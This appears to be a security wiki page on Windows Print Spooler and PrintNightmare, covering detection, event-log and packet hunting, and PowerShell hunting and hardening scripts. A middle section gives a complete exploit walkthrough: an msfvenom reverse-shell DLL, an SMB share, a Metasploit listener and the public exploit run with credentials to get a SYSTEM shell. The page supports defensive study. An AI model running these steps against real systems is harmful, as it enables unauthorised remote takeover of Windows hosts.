# Windows Print Spooler Service

The Print Spooler (`spoolsv.exe`) runs as `NT AUTHORITY\SYSTEM` on every Windows host that participates in print services, domain controllers included by default. It exposes the MS-RPRN interface over the `\pipe\spoolss` named pipe (SMB, TCP 445) and the MS-PAR interface over a dynamic RPC port in the 49152-65535 range that clients look up through the endpoint mapper on TCP 135. Unpatched or unhardened hosts may be vulnerable to PrintNightmare (CVE-2021-1675 / CVE-2021-34527).

### Investigation <a href="#investigation" id="investigation"></a>

```
# Check if the Print Spooler service is running
Get-Service -Name Spooler
```

### Detection <a href="#detection" id="detection"></a>

#### Services <a href="#services" id="services"></a>

1. Open Services (`services.msc`).
2. Find **Print Spooler** in the right pane.
3. Double-click it to see its status, startup type and the `spoolsv.exe` path.

#### Malicious DLL Location <a href="#malicious-dll-location" id="malicious-dll-location"></a>

The spooler copies the driver DLL it fetched from the attacker's share into its driver store and loads it from there, so a dropped DLL ends up in (and, after repeated attempts, in the `Old\` subfolders of):

```
C:\Windows\System32\spool\drivers\x64\3\
```

#### Event Viewer <a href="#event-viewer" id="event-viewer"></a>

Open Event Viewer and look at the following channels in the left pane.\
To filter by Event ID, use **"Filter Current Log"** in the right pane.

* Application and Services Logs/Microsoft/Windows/PrintService/Admin (Event ID: 808, the spooler failed to load a plug-in module, i.e. the rogue driver DLL)
* Application and Services Logs/Microsoft/Windows/PrintService/Operational (Event ID: 316, which lists the driver files added or updated, and 811)
* Application and Services Logs/Microsoft/Windows/SMBClient/Security (Event ID: 31017, insecure guest logon rejected, seen when the spooler is pointed at an attacker share that allows guest access)
* Application and Services Logs/Microsoft/Windows/Sysmon/Operational (Event ID: 3 network connection from `spoolsv.exe` to the share, 11 DLL created in the driver directory, 23 and 26 file deleted)
* Windows Logs/System (Event ID: 7031, Service Control Manager reporting the spooler terminated unexpectedly)
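As an added example, not code from the original page, the following PowerShell function runs the same hunt from the console: it pulls the Event IDs listed above from each channel and then lists DLLs recently written under the driver directory from the Malicious DLL Location section, with their Authenticode status. It assumes it is run from an elevated prompt on the suspected host; the channel names are the standard ones behind the Event Viewer tree, while the function name, the `-Since` window and the keyword filter applied to Sysmon records are my own choices.

```powershell
# Added example (not from the original page): hunt the channels above for
# PrintNightmare indicators and list recently written driver-store DLLs.
# Assumptions: run as Administrator; Sysmon may be absent (its channel is skipped).
function Find-PrintNightmareEvents {
    [CmdletBinding()]
    param(
        [datetime]$Since = (Get-Date).AddDays(-7),
        [string]$DriverDir = 'C:\Windows\System32\spool\drivers\x64\3'
    )

    # Channel -> Event IDs, the same list as the Event Viewer section.
    $queries = @(
        @{ LogName = 'Microsoft-Windows-PrintService/Admin';       Id = 808 }
        @{ LogName = 'Microsoft-Windows-PrintService/Operational'; Id = 316, 811 }
        @{ LogName = 'Microsoft-Windows-SMBClient/Security';       Id = 31017 }
        @{ LogName = 'Microsoft-Windows-Sysmon/Operational';       Id = 3, 11, 23, 26 }
        @{ LogName = 'System';                                     Id = 7031 }
    )

    foreach ($q in $queries) {
        $filter = $q.Clone()
        $filter['StartTime'] = $Since
        try {
            $events = Get-WinEvent -FilterHashtable $filter -ErrorAction Stop
        } catch {
            # "No events were found" and a missing channel (no Sysmon installed)
            # both land here; neither should abort the rest of the sweep.
            continue
        }
        foreach ($e in $events) {
            $msg = [string]$e.Message
            # Sysmon is noisy: keep only records mentioning the spooler, a DLL, or a
            # UNC path (the exploit points the spooler at an attacker-controlled share).
            if ($q.LogName -like '*Sysmon*' -and $msg -notmatch 'spool|\.dll|\\\\') { continue }
            [pscustomobject]@{
                Time   = $e.TimeCreated
                Source = $q.LogName
                Id     = $e.Id
                Detail = ($msg -split "`r?`n")[0]
            }
        }
    }

    # Independent of logging: any DLL written into the driver store in the window,
    # reported with its signature status (an unsigned one is worth pulling for analysis).
    Get-ChildItem -Path $DriverDir -Filter *.dll -Recurse -ErrorAction SilentlyContinue |
        Where-Object { $_.LastWriteTime -ge $Since } |
        ForEach-Object {
            [pscustomobject]@{
                Time   = $_.LastWriteTime
                Source = 'DriverDir'
                Id     = (Get-AuthenticodeSignature -FilePath $_.FullName).Status
                Detail = $_.FullName
            }
        }
}

Find-PrintNightmareEvents | Sort-Object Time | Format-Table -AutoSize
```

Sorting everything by time is deliberate: a successful attempt reads as SMBClient 31017 or Sysmon 3, then Sysmon 11 for the DLL, then PrintService 316 or 808, and a crash shows up last as System 7031.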

#### Packet Analysis (Wireshark) <a href="#packet-analysis-wireshark" id="packet-analysis-wireshark"></a>

Open the .pcap file in Wireshark.

Filter with **"smb"** or **"smb2"** to see the target fetching the driver DLL from the attacker's share, and with **"spoolss"** to see the MS-RPRN calls themselves; `spoolss.opnum == 89` isolates `RpcAddPrinterDriverEx`, the call PrintNightmare abuses.

### PrintNightmare (Credential Required) <a href="#printnightmare-credential-required" id="printnightmare-credential-required"></a>

This is a remote code execution vulnerability in the Print Spooler service: an authenticated user can call `RpcAddPrinterDriverEx` and make the spooler, which runs as `SYSTEM`, load a DLL of the attacker's choosing.\
It requires valid domain credentials (username/password).

#### 1. Check If RPC Endpoints Exist <a href="#id-1-check-if-rpc-endpoints-exist" id="id-1-check-if-rpc-endpoints-exist"></a>

```
impacket-rpcdump @<target-ip> | egrep 'MS-RPRN|MS-PAR'
# Protocol: [MS-RPRN]: Print System Remote Protocol 
# Protocol: [MS-PAR]: Print System Asynchronous Remote Protocol
```

If the spooler endpoints (`MS-RPRN` and/or `MS-PAR`) are listed, the service is reachable and the following steps can be tried.

#### 2. Create & Host Malicious DLL <a href="#id-2-create-host-malicious-dll" id="id-2-create-host-malicious-dll"></a>

We create a malicious DLL that spawns a reverse shell. The spooler loads it as `SYSTEM`, so the shell comes back with those privileges.

```
mkdir share
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<local-ip> LPORT=<local-port> -f dll -o ./share/malicious.dll
```

Then host it with SMB server in local machine.

```
impacket-smbserver share ./share/  -smb2support
```

#### 3. Start Local Listener <a href="#id-3-start-local-listener" id="id-3-start-local-listener"></a>

For receiving incoming connection, we need to prepare a listener.

```
msfconsole

msf > use exploit/multi/handler
msf > set payload windows/x64/meterpreter/reverse_tcp
msf > set lhost <local-ip>
msf > set lport <local-port>

msf > run -j

# Started reverse tcp

msf > jobs
```

#### 4. Run Exploit <a href="#id-4-run-exploit" id="id-4-run-exploit"></a>

```
git clone https://github.com/cube0x0/CVE-2021-1675
cd CVE-2021-1675
# example.local is the target's domain; the last argument is the UNC path to the DLL on the share hosted in step 2
python3 CVE-2021-1675.py example.local/<username>:<password>@<remote-ip> '\\<local-ip>\share\malicious.dll'
```

Now we should get a session from the target in msfconsole, running as `NT AUTHORITY\SYSTEM`.

#### 5. Interact with Target System <a href="#id-5-interact-with-target-system" id="id-5-interact-with-target-system"></a>

Enter the target system via msfconsole.

```
msf> sessions
msf> sessions -i <session-id>
meterpreter> shell

C:\Windows\system32> whoami
# nt authority\system
```

### Workarounds <a href="#workarounds" id="workarounds"></a>

```
# Disable the Print Spooler service
Stop-Service -Name Spooler -Force
Set-Service -Name Spooler -StartupType Disabled
```
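Disabling the service is not an option on a host that must keep printing. As an added example, not code from the original page or from Microsoft, the following PowerShell function audits (and with `-Fix` applies) the alternative mitigations. It assumes the two registry values Microsoft's advisory for CVE-2021-34527 describes: `RegisterSpoolerRemoteRpcEndPoint = 2` under `HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Printers` (spooler does not accept remote clients) and `RestrictDriverInstallationToAdministrators = 1` under its `PointAndPrint` subkey (only administrators may add drivers). The function and parameter names are my own, and it must run from an elevated prompt.

```powershell
# Added example (not from the original page or from Microsoft): audit the
# PrintNightmare mitigations on a host and optionally apply the registry ones.
# Assumed values, from Microsoft's CVE-2021-34527 guidance:
#   HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Printers
#       RegisterSpoolerRemoteRpcEndPoint (DWORD) = 2   -> inbound remote printing off
#   HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PointAndPrint
#       RestrictDriverInstallationToAdministrators (DWORD) = 1 -> admins only
# Run from an elevated PowerShell prompt.
function Test-SpoolerHardening {
    [CmdletBinding()]
    param(
        # -Fix writes the two registry values; the service itself is left alone so
        # the host can keep printing.
        [switch]$Fix
    )

    $printersKey = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\Printers'
    $pnpKey      = Join-Path $printersKey 'PointAndPrint'

    function Get-RegDword([string]$Path, [string]$Name) {
        # Returns $null when the key or value is absent instead of throwing.
        $item = Get-ItemProperty -Path $Path -Name $Name -ErrorAction SilentlyContinue
        if ($null -eq $item) { return $null }
        return $item.$Name
    }

    if ($Fix) {
        New-Item -Path $pnpKey -Force | Out-Null   # creates the parent key as well
        Set-ItemProperty -Path $printersKey -Name RegisterSpoolerRemoteRpcEndPoint -Type DWord -Value 2
        Set-ItemProperty -Path $pnpKey -Name RestrictDriverInstallationToAdministrators -Type DWord -Value 1
    }

    $svc       = Get-Service -Name Spooler
    $remoteRpc = Get-RegDword $printersKey 'RegisterSpoolerRemoteRpcEndPoint'
    $restrict  = Get-RegDword $pnpKey 'RestrictDriverInstallationToAdministrators'

    # One row per control so the output reads as a checklist; a host needs either
    # the first row or both of the others to pass.
    [pscustomobject]@{
        Control = 'Spooler stopped and disabled'
        Value   = "$($svc.Status)/$($svc.StartType)"
        Pass    = ($svc.Status -eq 'Stopped' -and $svc.StartType -eq 'Disabled')
    }
    [pscustomobject]@{
        Control = 'Inbound remote printing blocked (RegisterSpoolerRemoteRpcEndPoint=2)'
        Value   = $remoteRpc
        Pass    = ($remoteRpc -eq 2)
    }
    [pscustomobject]@{
        Control = 'Driver install restricted to admins (RestrictDriverInstallationToAdministrators=1)'
        Value   = $restrict
        # Assumption: on a host carrying the 2021 spooler updates an absent value is
        # restrictive by default, so only an explicit 0 is treated as a failure.
        Pass    = ($restrict -ne 0)
    }
}

Test-SpoolerHardening | Format-Table -AutoSize
```

Run it without `-Fix` first on a representative host; `RegisterSpoolerRemoteRpcEndPoint = 2` breaks printing for clients of that host, so it belongs on workstations and on servers that are not print servers, and print servers should rely on the driver-installation restriction plus the patch.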

### References <a href="#references" id="references"></a>

* [Microsoft](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527)
* [TryHackMe](https://tryhackme.com/room/printnightmarehpzqlp8)
